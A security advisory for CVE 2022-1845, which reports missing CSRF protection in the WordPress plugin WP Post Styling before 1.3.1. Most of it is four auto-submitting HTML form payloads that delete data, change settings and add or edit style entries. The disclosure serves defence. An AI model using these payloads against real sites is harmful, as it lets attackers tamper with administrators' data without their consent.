WP Post Styling < 1.3.1 – Multiple CSRF | CVE 2022-1845

Description

The plugin does not have CSRF checks in various actions, which could allow attackers to make a logged in admin delete plugin's data, update the settings, add new entries and more via CSRF attacks

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling/wp-post-styling.php" method="POST">
    <input type="text" name="delete_style" value="1">
    <input type="text" name="submit-type" value="library">
    <input type="text" name="submit" value="Yes, delete it!">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php" method="POST">
    <input type="text" name="jd-post-styling-screen" value="1">
    <input type="text" name="jd-post-styling-default" value="disable">
    <input type="text" name="jd-post-styling-library" value="disable">
    <input type="text" name="jd-post-styling-boxsize" value="6">
    <input type="text" name="submit-type" value="options">
    <input type="text" name="submit" value="Save WP Post Styling Options">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php&edit_style=1" method="POST">
    <input type="text" name="edit_style" value="1">
    <input type="text" name="jd_style_library_name" value="test">
    <input type="text" name="jd_style_library_css" value="body {color: blue}">
    <input type="text" name="jd_style_library_type" value="screen">
    <input type="text" name="submit-type" value="library">
    <input type="text" name="submit" value="Update WP Post Styling Library">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>


<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php" method="POST">
    <input type="text" name="jd_style_library_name" value="test2">
    <input type="text" name="jd_style_library_css" value="body {color: blue}">
    <input type="text" name="jd_style_library_type" value="screen">
    <input type="text" name="submit-type" value="library">
    <input type="text" name="submit" value="Add to WP Post Styling Library">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>